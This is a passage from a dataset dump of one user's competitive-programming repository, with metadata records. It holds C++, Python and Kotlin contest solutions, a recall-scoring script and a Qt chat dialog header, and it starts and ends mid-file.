readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);mx=max(mx,x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nvi a, date, indexes;\nint n, k;\nchar s[11];\nint years[300];\nint month[13] = {31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31};\nbool is[200000];\n\nint g(int i)\n{\n return (1900 + i) / 4 == 0 && ((1900 + i) % 100) || (1900 + i) / 400 == 0;\n}\n\nint f(char s[])\n{\n int d = (s[0] - '0') * 10 + s[1] - '0',\n m = (s[3] - '0') * 10 + s[4] - '0',\n y = (s[6] - '0') * 1000 + (s[7] - '0') * 100 + (s[8] - '0') * 10 + s[9] - '0';\n y -= 1900;\n int ans = years[y] + d + (m > 2 ? g(y) : 0);\n ans += month[m];\n return ans;\n}\n\nbool cmp(int i, int j)\n{\n if (date[i] < date[j])\n return true; else\n if (date[i] > date[j])\n return false;\n else return a[i] < a[j];\n}\n\nvoid toDate(int k)\n{\n int tt = 0, count = 0;\n while (tt >= k)\n tt -= years[tt],\n count++;\n int xy = 11;\n while (tt - month[xy] < k)\n xy--;\n tt -= month[xy];\n printf(\"%d:%d:%d\\n\", tt, xy, count + 1900 - 1);\n}\n\n\nint yy[1000000], mm[1000000], dd[1000000];\nvoid run()\n{\n years[0] = 0;\n int t;\n for (int i = 1; i <= 12; i++)\n month[i] = month[i - 1] + month[i];\n for (int i = -202; i < 202; i++)\n {\n years[i + 203] = years[i - 1 + 203] + 365;\n if (g(i))\n years[i]++;\n }\n readln(n);\n for (int i = 0; i < n; i++)\n {\n scanf(\"%s\\n\", s);\n scanf(\"%s\\n\", s);\n date.pb(f(s));\n //writeln(f(s));\n is[date[i]] = true;\n readln(k);\n a.pb(k);\n indexes.pb(i);\n }\n sort(indexes.begin(), indexes.end(), cmp);\n int k = INF;\n for (int i = 0; i < n; i++)\n {\n bool f = false;\n for (int j = 0; j < a[indexes[i]]; j++)\n if (is[date[indexes[i]] - j - 1 + con])\n continue; else\n {\n is[date[indexes[i]] - j - 1 + con] = true;\n f = true;\n// writeln(date[indexes[i]] - j - 1, k);\n k = min(date[indexes[i]] - j - 1 + con, k);\n break;\n }\n if (!f)\n {\n printf(\"Impossible\\n\");\n return;\n }\n }\n toDate(k);\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4501347839832306, "alphanum_fraction": 0.4568733274936676, "avg_line_length": 27.5, "blob_id": "58de38aaabf252163427cc1b08264f8211295371", "content_id": "48aedf6937a42dc91e5ce1c6d8b57a70d76bc5d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 742, "license_type": "no_license", "max_line_length": 70, "num_lines": 26, "path": "/2021/vkcupMl/getRecall.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import csv\n\nanswers = './TEST/test.csv'\noutput = './TEST/submit.csv'\n\nwith open(answers, 'r') as answersFile:\n reader = csv.DictReader(answersFile)\n with open(output, 'r') as outputFile:\n tpfn = 0\n f = {}\n for row in reader:\n u = int(row['u'])\n v = int(row['v'])\n if not u in f:\n f[u] = set()\n f[u].add(v)\n tpfn += 1\n tp = 0\n for row in outputFile.readlines():\n if len(row) <= 5: continue\n u, vs = row.strip().split(': ')\n u = int(u)\n if not u in f: continue\n tp += len(set(map(int, vs.split(','))).intersection(f[u]))\n\n print(f'RECALL: {tp / tpfn:.5f}, {tp}/{tpfn}')\n\n" }, { "alpha_fraction": 0.6834611296653748, "alphanum_fraction": 0.6845564246177673, "avg_line_length": 23, "blob_id": "87142195c1f56726810dfe184ccb4968bcf1d56d", "content_id": "24eb00771e030ab65855a556602b3fdce38566a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 913, "license_type": "no_license", "max_line_length": 69, "num_lines": 38, "path": "/study/ChatNotDemo/chatdialog.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " #ifndef CHATDIALOG_H\n #define CHATDIALOG_H\n\n #include \"ui_chatdialog.h\"\n#include \"QMessageBox\"\n#include \"QScrollBar\"\n\n class ChatDialog : public QDialog, private Ui::ChatDialog\n {\n Q_OBJECT\n\n public:\n ChatDialog(QWidget *parent = 0);\n ~ChatDialog();\n\n public slots:\n void appendMessage(const QString &from, const QString &message);\n\n private slots:\n void getMsg();\n void returnPressed();\n void newParticipant(const QString &nick);\n void participantLeft(const QString &nick);\n void clearHistory();\n\n private:\n void sendMsg(QString nick, QString msg);\n void showHistory();\n void printf(QColor color, QString nick, QString did);\n void logMessage(const QString &nick, const QString &message);\n QString myNickName;\n void getTime(time_t timer, char[]);\n QTextTableFormat tableFormat;\n QString localIP(int i);\n QString getUserList();\n };\n\n #endif\n" }, { "alpha_fraction": 0.5104572772979736, "alphanum_fraction": 0.5242821574211121, "avg_line_length": 29.497297286987305, "blob_id": "12ea37e93ec385063fc5451d3615485536ea5c33", "content_id": "7ef265828380f4ada417cc04b5624ccf7cad2f01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5642, "license_type": "no_license", "max_line_length": 173, "num_lines": 185, "path": "/2022/ghc/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//}}}\n\nstruct project\n{\n string name;\n int d, s, b, r;\n map<string, int> skills;\n vector<string> assigned;\n vector<pair<string, int>> roles;\n\n project() {}\n};\n\nstruct human\n{\n string name;\n map<string, int> skills;\n int time = 0;\n int prevTime = 0;\n\n human() {}\n};\n\nistream& operator>>(istream& is, project& p) {\n is >> p.name >> p.d >> p.s >> p.b >> p.r;\n p.roles.resize(p.r);\n p.assigned.resize(p.r);\n fori(p.r)\n is >> p.roles[i].first >> p.roles[i].second;\n for (auto& [skill, level]: p.roles)\n p.skills[skill] = level;\n return is;\n}\n\nistream& operator>>(istream& is, human& h) {\n int n;\n is >> h.name >> n;\n string skill;\n int level;\n fori(n)\n is >> skill >> level,\n h.skills[skill] = level;\n return is;\n}\n\nvoid run()\n{\n ints(c, p);\n vector<human> humans(c);\n vector<project> projects(p);\n readln(humans, projects);\n sort(all(projects), [&](const project& a, const project& b) {\n return a.s < b.s;\n });\n int M = 10;\n for (int i = 0; i < p; i += M)\n shuffle(projects.begin() + i, projects.begin() + i + M, rng);\n shuffle(all(humans), rng);\n sort(all(humans), [&](const human& a, const human& b) {\n return a.skills.size() > b.skills.size();\n });\n map<string, int> h_by_name;\n fori(c)\n h_by_name[humans[i].name] = i;\n int maxScore = 0;\n int score = 0;\n for (auto &p: projects) {\n maxScore += p.s;\n map<string, int> cur;\n bool can = true;\n int b = 0;\n map<string, bool> used;\n vector<int> perm(p.r);\n iota(all(perm), 0);\n shuffle(all(perm), rng);\n\n for (int i: perm)\n {\n const auto& [skill, level] = p.roles[i];\n int bestTime = MOD;\n\n vector<int> ppp(c);\n iota(all(ppp), 0);\n //shuffle(all(ppp), rng);\n\n human& best = humans[0];\n for (int j: ppp)\n {\n human& h = humans[j];\n if (!used.contains(h.name))\n if (h.skills[skill] >= level || (h.skills[skill] + 1 == level && cur[skill] >= level))\n if (h.time < bestTime)\n bestTime = h.time,\n best = h;\n }\n can &= bestTime < MOD;\n if (!can) break;\n\n b = max(b, bestTime);\n p.assigned[i] = best.name;\n used[best.name] = true;\n for (auto& [skill, level]: best.skills)\n cur[skill] = max(cur[skill], level);\n }\n if (can)\n {\n int time = b + p.d;\n int currentScore = max(0, p.s - max(0, time - p.b));\n if (currentScore == 0) continue;\n fori(p.r)\n {\n const auto& name = p.assigned[i];\n const auto& [skill, level] = p.roles[i];\n auto& h = humans[h_by_name[name]];\n h.time = time;\n if (h.skills[skill] <= level)\n h.skills[skill]++;\n }\n writeln(p.name);\n writeln(p.assigned);\n score += currentScore;\n }\n }\n cerr << score << \" / \" << maxScore << endl;\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.36016950011253357, "alphanum_fraction": 0.38983049988746643, "avg_line_length": 15.857142448425293, "blob_id": "56a7cd2272542f840924e26665e850fc7116fc2d", "content_id": "644b966c9bfa88622b2da7b1f2823176a2c92b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 236, "license_type": "no_license", "max_line_length": 27, "num_lines": 14, "path": "/2017/newYear/L.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "s = list(input())\ncarry = True\nl = len(s)\nfor i in range(l):\n if s[l - i - 1] != '0':\n s[l - i - 1] = '0'\n else:\n s[l - i - 1] = '1'\n carry = False\n break\n\nif carry:\n s = ['1'] + s\nprint(''.join(s))\n" }, { "alpha_fraction": 0.444029837846756, "alphanum_fraction": 0.46641790866851807, "avg_line_length": 18.14285659790039, "blob_id": "0e35066758e4b70d098beb53e63137ced962e7b2", "content_id": "5808759dc3e18820682e255b624a17f2c37e9682", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 268, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.17/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open(\"input.txt\", \"r\")\nn = int(f.readline())\nx = {'Emperor Penguin': 0, 'Macaroni Penguin': 0, 'Little Penguin': 0}\nfor i in range(n):\n x[f.readline()[:-1]] += 1\n\nmx = -1\nans = ''\nfor y in x:\n if x[y] > mx:\n mx = x[y]\n ans = y\n\nopen(\"output.txt\", \"w\").write(ans)\n" }, { "alpha_fraction": 0.45697712898254395, "alphanum_fraction": 0.467934250831604, "avg_line_length": 25.75, "blob_id": "ff01e9db9f6d2975720acd797a2a71edfe6f63e5", "content_id": "f3972a0d14cb9f30ea0245e8d74e795c7a4ab105", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3103, "license_type": "no_license", "max_line_length": 96, "num_lines": 116, "path": "/CodeForce/1489/G.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.collections.*// }}}\n\nclass DSU(n: Int) {\n\n private var a = IntArray(n)\n private var sz = IntArray(n) { 1 }\n\n init {\n for (i in a.indices) a[i] = i\n }\n\n fun get(i: Int): Int {\n return if (a[i] == i)\n i\n else {\n a[i] = get(a[i]);\n a[i]\n }\n }\n\n fun union(i: Int, j: Int): Boolean {\n var l = get(i)\n var r = get(j)\n if (l == r) return false\n if (sz[l] > sz[r]) {\n val t = l\n l = r\n r = t\n }\n sz[r] += sz[l]\n a[l] = r\n return true\n }\n}\n\nprivate fun run() {\n val (n, m) = readln()\n val a = readLine()!!.split(\" \").map { it.toLong() }.zip(0..n).sortedBy { it.first }\n val b = Array(m) {\n val x = readLine()!!.split(\" \").map { it.toLong() }\n Triple(x[0].toInt() - 1, x[1].toInt() - 1, x[2])\n }.sortedBy { it.third }\n var ans = 0L\n val d = DSU(n)\n var j = 0\n for (i in 1 until n) {\n val first = d.get(a[0].second)\n val second = d.get(a[i].second)\n if (first == second) continue\n while (j < m && b[j].third <= a[0].first + a[i].first) {\n if (d.union(b[j].first, b[j].second))\n ans += b[j].third\n ++j\n }\n if (d.union(a[0].second, a[i].second))\n ans += a[0].first + a[i].first\n }\n writeln(ans)\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n// val (t) = readln()\n val t = 1\n for (q in 1..t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.5054455399513245, "alphanum_fraction": 0.5133663415908813, "avg_line_length": 32.11475372314453, "blob_id": "2e2bbbb5e88d20991af89d1927c837b35de38c9b", "content_id": "a869c3efb62246407286349f4a36f73ff9123639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2020, "license_type": "no_license", "max_line_length": 928, "num_lines": 61, "path": "/CodeForce/0347/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"a\";\nstring FILEINPUT = FILENAME;\nbool ONLINE_JUDGE = false;\nvector<int> a;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid run()\n{\n int n;\n readln(n);\n readln(a, n);\n int count = 1;\n bool f = false;\n for (int i = 0; i < n; i++)\n if (a[i] == i)\n count++; else\n if (a[a[i]] == i)\n f = true;\n printf(\"%d\\n\", min(n, count + f));\n}\n\nint main()\n{\n //ONLINE_JUDGE = true;\n if (ONLINE_JUDGE)\n {\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n }\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.46268656849861145, "alphanum_fraction": 0.49253731966018677, "avg_line_length": 66, "blob_id": "c5b65a6b04f903c1761e02e068f58cebdf981ff2", "content_id": "cbb8b41cf6679d97cf265e0385bb469f1449f53d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67, "license_type": "no_license", "max_line_length": 66, "num_lines": 1, "path": "/CodeForce/0784/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(''.join('>'+'+'*(48+int(x))+'.'for x in str(eval(input()))))\n" }, { "alpha_fraction": 0.36666667461395264, "alphanum_fraction": 0.44999998807907104, "avg_line_length": 29, "blob_id": "5d6240c9b7cd8128aec4c8a154aab0e472f0492d", "content_id": "6b3db6924688866af676af29cf9602dae1405146", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 60, "license_type": "no_license", "max_line_length": 42, "num_lines": 2, "path": "/CodeForce/0617/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint((n // 5) + (1 if n % 5 != 0 else 0))\n" }, { "alpha_fraction": 0.32846716046333313, "alphanum_fraction": 0.36496350169181824, "avg_line_length": 17.266666412353516, "blob_id": "7f3060c6961ed42b6a061321bc67827518b450cb", "content_id": "d992d49595a33eb7299f39961698337e15bb272e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 274, "license_type": "no_license", "max_line_length": 40, "num_lines": 15, "path": "/CodeForce/0513/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "[n, m] = list(map(int, input().split()))\na = [0] * n\nl = 0\nr = n\nm -= 1\nfor i in range(1, n + 1):\n deg = 1 << max(n - i - 1, 0)\n if m >= deg:\n m -= deg\n r -= 1\n a[r] = i\n else:\n a[l] = i\n l += 1\nprint(' '.join(str(x) for x in a))\n" }, { "alpha_fraction": 0.4566611051559448, "alphanum_fraction": 0.47686734795570374, "avg_line_length": 25.87640380859375, "blob_id": "5c3261feaaf16f74fd9f6cd7a49435416db64cff", "content_id": "79b69f3344ffbd303eef0e7fa4e8ee1d1db09a7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7176, "license_type": "no_license", "max_line_length": 174, "num_lines": 267, "path": "/2020/yaTest/Fnow.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ninline bool inside(int lx, int ly, int rx, int ry, int x, int y)\n{\n return lx <= x && x < rx && ly <= y && y < ry;\n}\n\nstatic const int N = 1048576;\nstatic const int R = 16;\nstatic const int CCC = int(N * 1.33) + 100;\nint w = 0;\n\nstruct quadro\n{\n set<pii> points;\n int lx, ly, sz;\n int i = 0;\n\n quadro() {}\n quadro(int lx, int ly, int sz): lx(lx), ly(ly), sz(sz) {\n w++;\n }\n\n void init(int lx, int ly, int sz)\n {\n this->lx = lx;\n this->ly = ly;\n this->sz = sz;\n }\n\n void insert(int x, int y);\n void erase(int x, int y);\n pii get(int left, int down, int right, int up);\n};\n\nquadro Q[CCC];\nint ii[CCC][16];\n\nvoid quadro::insert(int x, int y)\n{\n //writeln(\"Adding\", x, y, \"to\", lx, ly, sz); cout.flush();\n\n auto create = [&](const int& index, int x, int y, int lx, int ly) {\n if (ii[i][index] == -1)\n {\n ii[i][index] = w++;\n Q[ii[i][index]].init(lx, ly, sz / 4);\n Q[ii[i][index]].i = ii[i][index];\n }\n Q[ii[i][index]].insert(x, y);\n };\n\n auto iii = [&](const int& x, const int& y) {\n int ix = (x - lx) / sz;\n int iy = (y - ly) / sz;\n int index = ix * 4 + iy;\n create(index, x, y, lx + ix * sz, ly + iy * sz);\n };\n\n if (points.size() == R)\n for (const auto& [yy, mxx]: points)\n iii(-mxx, yy);\n if (points.size() >= R)\n iii(x, y);\n points.emplace(y, -x);\n}\n\nvoid quadro::erase(int x, int y)\n{\n points.erase({y, -x});\n\n auto create = [&](const int& index) {\n if (ii[i][index] != -1) {\n Q[ii[i][index]].erase(x, y);\n if (Q[ii[i][index]].points.size() == 0)\n ii[i][index] = -1;\n }\n };\n int ix = (x - lx) / sz;\n int iy = (y - ly) / sz;\n int index = ix * 4 + iy;\n create(index);\n}\n\n\npii quadro::get(int left, int down, int right, int up)\n{\n int rx = lx + sz * 4;\n int ry = ly + sz * 4;\n //writeln(\"Asking\", left, down, right, up, lx, ly, rx, ry);\n if (points.size() == 0 || rx <= left || ry <= down || lx >= right || ly >= up) //No points or we are outside of query \n return {-1, -1};\n //writeln(\"Found points, searching\");\n if (lx >= left && ly >= down && rx <= right && ry <= up) //We are inside in query\n return *points.begin();\n\n pii ans = {-1, -1};\n\n if (points.size() <= R)\n {\n for (const auto& pp: points)\n if (inside(left, down, right, up, -pp.second, pp.first))\n if (ans.first == -1)\n return pp;\n return ans;\n }\n //writeln(\"2 queries\");\n\n auto update = [&](const int& index) {\n if (ii[i][index] == -1)\n return;\n auto a = Q[ii[i][index]].get(left, down, right, up);\n if (a.first != -1)\n {\n if (ans.first != -1)\n ans = min(a, ans);\n else\n ans = a;\n }\n };\n\n update(0);\n update(4);\n update(8);\n update(12);\n if (ans.first == -1)\n {\n update(1);\n update(5);\n update(9);\n update(13);\n }\n if (ans.first == -1)\n {\n update(2);\n update(6);\n update(10);\n update(14);\n }\n if (ans.first == -1)\n {\n update(3);\n update(7);\n update(11);\n update(15);\n }\n return ans;\n}\n\nstruct pair_hash {\n inline long long operator()(const pii& v) const {\n return (v.first << 20) + v.second;\n }\n};\n\n//static const int N = 16;\nvoid run()\n{\n fori(CCC) forj(16) ii[i][j] = -1;\n ints(n, m, k);\n Q[0] = quadro(0, 0, N / 4);\n vector<pii> a(k);\n readln(a);\n unordered_set<pii, pair_hash> p(all(a));\n sort(all(a));\n for (const auto& [x, y]: a)\n //writeln(\"Inserting\", x, y, w), cout.flush(),\n Q[0].insert(x, y);\n\n //fori(w)\n //Q[i].points = set<pii>(all(W[i]));\n\n int ans = 0;\n while (p.size())\n {\n //writeln(\"New iteration\"); cout.flush();\n int l = -1;\n int r = 0;\n int px = 0;\n while (true)\n {\n //writeln(\"Asking\", l, r, N, N);\n auto point = Q[0].get(l, r, N, N);\n if (point.first == -1)\n break;\n auto& [qy, qx] = point; qx *= -1;\n if (qx == n - 1 && qy == 0) --ans;\n //writeln(qx, qy);\n\n int x = qx;\n int y = qy;\n if (y != r)\n px = l + 1;\n while (true)\n {\n auto it = p.find({x, y});\n if (it == p.end() || x < px)\n break;\n //writeln(\"Erasing\", x, y);\n p.erase({x, y});\n Q[0].erase(x, y);\n --x;\n }\n px = x + 1;\n //writeln(\"PX\", px);\n l = qx;\n r = qy + 1;\n }\n ans += 2;\n }\n writeln(ans);\n cerr << \"w = \" << w << endl;\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.45644116401672363, "alphanum_fraction": 0.4800741374492645, "avg_line_length": 29.828571319580078, "blob_id": "6a0bb40a2be1220d5c2008dd46165f15a83b6e0d", "content_id": "995cb6c4ccd45f92aa339b78f4ad9d2a945186f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2158, "license_type": "no_license", "max_line_length": 928, "num_lines": 70, "path": "/2013/2013GCJ1stRoundA/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n#define ll unsigned long long\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nll ss(ll n, ll R)\n{\n 